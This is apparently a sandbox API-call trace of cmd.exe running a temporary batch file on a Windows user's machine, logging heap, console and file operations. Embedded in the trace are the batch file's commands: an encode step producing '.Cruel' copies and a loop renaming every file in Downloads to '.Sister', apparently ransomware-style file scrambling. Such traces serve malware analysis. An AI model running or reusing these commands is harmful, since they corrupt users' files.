CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=29, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="cd %UserProFile%\\Downloads\\\r\nutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 29 [0289.522] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.522] GetFileType (hFile=0x98) returned 0x1 [0289.522] _get_osfhandle (_FileHandle=3) returned 0x98 [0289.522] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a1 [0289.522] GetProcessHeap () returned 0x21ed8c70000 [0289.522] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d32630 [0289.523] GetProcessHeap () returned 0x21ed8c70000 [0289.523] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8d36650 [0289.523] GetProcessHeap () returned 0x21ed8c70000 [0289.523] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8d45d70 [0289.524] GetEnvironmentVariableW (in: lpName="UserProFile", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0289.524] GetProcessHeap () returned 0x21ed8c70000 [0289.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d70) returned 1 [0289.524] GetProcessHeap () returned 0x21ed8c70000 [0289.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d36650) returned 1 [0289.524] GetProcessHeap () returned 0x21ed8c70000 [0289.524] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d32630) returned 1 [0289.525] _wcsicmp (_String1="cd", _String2=")") returned 58 [0289.525] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0289.525] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0289.525] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0289.525] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0289.525] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0289.525] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0289.525] GetProcessHeap () returned 0x21ed8c70000 [0289.525] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96700 [0289.526] GetProcessHeap () returned 0x21ed8c70000 [0289.526] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x16) returned 0x21ed8c95900 [0289.526] GetProcessHeap () returned 0x21ed8c70000 [0289.526] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7c0c0 [0289.526] _tell (_FileHandle=3) returned 417 [0289.526] _close (_FileHandle=3) returned 0 [0289.526] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0289.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.526] GetFileType (hFile=0x50) returned 0x2 [0289.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0289.527] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0289.625] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.625] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0289.701] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0289.701] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0289.701] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0289.701] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0289.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.701] GetFileType (hFile=0x50) returned 0x2 [0289.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0289.702] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0289.771] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.771] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x18) returned 1 [0289.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.862] GetFileType (hFile=0x50) returned 0x2 [0289.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0289.862] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0289.948] _get_osfhandle (_FileHandle=1) returned 0x50 [0289.948] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c95910*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c95910*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0290.053] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" C:\\Users\\FD1HVy\\Downloads\\ ") returned 28 [0290.053] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.053] GetFileType (hFile=0x50) returned 0x2 [0290.053] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0290.053] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0290.126] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.126] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1c) returned 1 [0290.243] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0290.243] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.243] GetFileType (hFile=0x50) returned 0x2 [0290.243] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0290.243] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0290.320] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.320] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0290.434] malloc (_Size=0xffce) returned 0x21ed8e90940 [0290.434] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0290.434] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0290.434] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0290.434] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0290.434] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0290.434] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0290.434] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0290.434] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0290.505] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0290.505] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0290.505] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0290.505] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0290.505] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0290.505] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0290.505] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0290.505] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0290.505] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0290.505] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0290.505] ??_V@YAXPEAX@Z () returned 0x1 [0290.506] GetProcessHeap () returned 0x21ed8c70000 [0290.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379780 [0290.506] GetProcessHeap () returned 0x21ed8c70000 [0290.506] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379780, Size=0x48) returned 0x21ed8c7be40 [0290.506] GetProcessHeap () returned 0x21ed8c70000 [0290.506] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7be40) returned 0x48 [0290.506] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.506] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0290.506] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0290.506] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.506] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed97bfc00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fe2b0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fe2b0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0290.510] ??_V@YAXPEAX@Z () returned 0x1 [0290.510] GetProcessHeap () returned 0x21ed8c70000 [0290.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4e) returned 0x21ed8c7cb80 [0290.510] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0290.510] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0290.510] GetProcessHeap () returned 0x21ed8c70000 [0290.510] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x80) returned 0x21ed9379420 [0290.510] GetProcessHeap () returned 0x21ed8c70000 [0290.510] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9379420, Size=0x48) returned 0x21ed8c7bd50 [0290.510] GetProcessHeap () returned 0x21ed8c70000 [0290.511] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7bd50) returned 0x48 [0290.511] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0290.511] malloc (_Size=0xffce) returned 0x21ed97cfbe0 [0290.511] ??_V@YAXPEAX@Z () returned 0x21ed97cfbe0 [0290.511] GetProcessHeap () returned 0x21ed8c70000 [0290.511] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x46) returned 0x21ed8c7c070 [0290.511] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed97cfbe0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0290.511] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0290.512] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0290.512] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0290.512] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cac0 [0290.547] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0290.548] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Downloads", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 0x21ed8c7ca60 [0290.548] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0290.548] _wcsnicmp (_String1="DOWNLO~1", _String2="Downloads", _MaxCount=0x9) returned 29 [0290.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Downloads" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 0x11 [0290.548] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Downloads" (normalized: "c:\\users\\fd1hvy\\downloads")) returned 1 [0290.549] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Downloads") returned 1 [0290.549] GetProcessHeap () returned 0x21ed8c70000 [0290.549] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dcb0) returned 1 [0290.549] GetEnvironmentStringsW () returned 0x21ed8d6d110* [0290.549] GetProcessHeap () returned 0x21ed8c70000 [0290.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb44) returned 0x21ed8d6dc60 [0290.550] FreeEnvironmentStringsA (penv="=") returned 1 [0290.550] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Downloads") returned 0x19 [0290.550] GetProcessHeap () returned 0x21ed8c70000 [0290.550] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c070) returned 1 [0290.550] ??_V@YAXPEAX@Z () returned 0x1 [0290.550] ??_V@YAXPEAX@Z () returned 0x1 [0290.550] ??_V@YAXPEAX@Z () returned 0x1 [0290.550] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.550] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0290.655] _get_osfhandle (_FileHandle=1) returned 0x50 [0290.655] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0290.751] _get_osfhandle (_FileHandle=0) returned 0x4c [0290.751] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0290.823] SetConsoleInputExeNameW () returned 0x1 [0290.823] GetConsoleOutputCP () returned 0x1b5 [0290.900] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0290.901] SetThreadUILanguage (LangId=0x0) returned 0x409 [0290.971] ??_V@YAXPEAX@Z () returned 0x1 [0290.971] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0290.971] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0290.971] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.971] SetFilePointer (in: hFile=0x3c, lDistanceToMove=417, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bd50) returned 1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb80) returned 1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7be40) returned 1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7c0c0) returned 1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95900) returned 1 [0290.972] GetProcessHeap () returned 0x21ed8c70000 [0290.972] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96700) returned 1 [0290.973] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.973] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a1 [0290.973] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x35c, lpOverlapped=0x0) returned 1 [0290.973] SetFilePointer (in: hFile=0x3c, lDistanceToMove=419, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a3 [0290.973] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\n %UserProFile%\\Downloads\\\r\nutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0290.973] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.973] GetFileType (hFile=0x3c) returned 0x1 [0290.973] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.973] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a3 [0290.973] GetProcessHeap () returned 0x21ed8c70000 [0290.973] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0290.974] GetProcessHeap () returned 0x21ed8c70000 [0290.974] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0290.975] _tell (_FileHandle=3) returned 419 [0290.975] _close (_FileHandle=3) returned 0 [0290.975] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0290.976] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0290.976] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.976] SetFilePointer (in: hFile=0x3c, lDistanceToMove=419, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a3 [0290.976] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.976] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a3 [0290.976] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x35a, lpOverlapped=0x0) returned 1 [0290.976] SetFilePointer (in: hFile=0x3c, lDistanceToMove=511, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ff [0290.976] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=92, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 92 [0290.976] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.976] GetFileType (hFile=0x3c) returned 0x1 [0290.976] _get_osfhandle (_FileHandle=3) returned 0x3c [0290.976] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ff [0290.977] GetProcessHeap () returned 0x21ed8c70000 [0290.977] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9379db0 [0290.977] GetProcessHeap () returned 0x21ed8c70000 [0290.977] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379db0) returned 1 [0290.978] _wcsicmp (_String1="for", _String2=")") returned 61 [0290.978] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0290.978] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0290.978] GetProcessHeap () returned 0x21ed8c70000 [0290.978] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96280 [0290.978] GetProcessHeap () returned 0x21ed8c70000 [0290.978] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ca60 [0290.978] GetProcessHeap () returned 0x21ed8c70000 [0290.978] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45e30 [0290.978] GetProcessHeap () returned 0x21ed8c70000 [0290.978] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e30, Size=0x18) returned 0x21ed8c95a60 [0290.978] GetProcessHeap () returned 0x21ed8c70000 [0290.978] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95a60) returned 0x18 [0290.978] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0290.978] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0290.978] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0290.978] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0290.979] _wcsicmp (_String1="IN", _String2="in") returned 0 [0290.979] GetProcessHeap () returned 0x21ed8c70000 [0290.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c957a0 [0290.979] _wcsicmp (_String1="DO", _String2="do") returned 0 [0290.979] _wcsicmp (_String1="ren", _String2=")") returned 73 [0290.979] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0290.979] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0290.979] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0290.979] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0290.979] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0290.979] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0290.979] GetProcessHeap () returned 0x21ed8c70000 [0290.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c95f80 [0290.979] GetProcessHeap () returned 0x21ed8c70000 [0290.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c95900 [0290.979] GetProcessHeap () returned 0x21ed8c70000 [0290.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc86d0 [0290.979] GetProcessHeap () returned 0x21ed8c70000 [0290.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96040 [0290.980] _wcsicmp (_String1="for", _String2=")") returned 61 [0290.980] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0290.980] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96a00 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7ce20 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45bf0 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45bf0, Size=0x18) returned 0x21ed8c95740 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95740) returned 0x18 [0290.980] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0290.980] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0290.980] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0290.980] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0290.980] _wcsicmp (_String1="IN", _String2="in") returned 0 [0290.980] GetProcessHeap () returned 0x21ed8c70000 [0290.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96340 [0290.980] _wcsicmp (_String1="DO", _String2="do") returned 0 [0290.981] _wcsicmp (_String1="ren", _String2=")") returned 73 [0290.981] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0290.981] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0290.981] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0290.981] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0290.981] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0290.981] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0290.981] GetProcessHeap () returned 0x21ed8c70000 [0290.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96c40 [0290.981] GetProcessHeap () returned 0x21ed8c70000 [0290.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 0x21ed8c959c0 [0290.981] GetProcessHeap () returned 0x21ed8c70000 [0290.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bee0 [0290.981] _tell (_FileHandle=3) returned 511 [0290.981] _close (_FileHandle=3) returned 0 [0290.982] 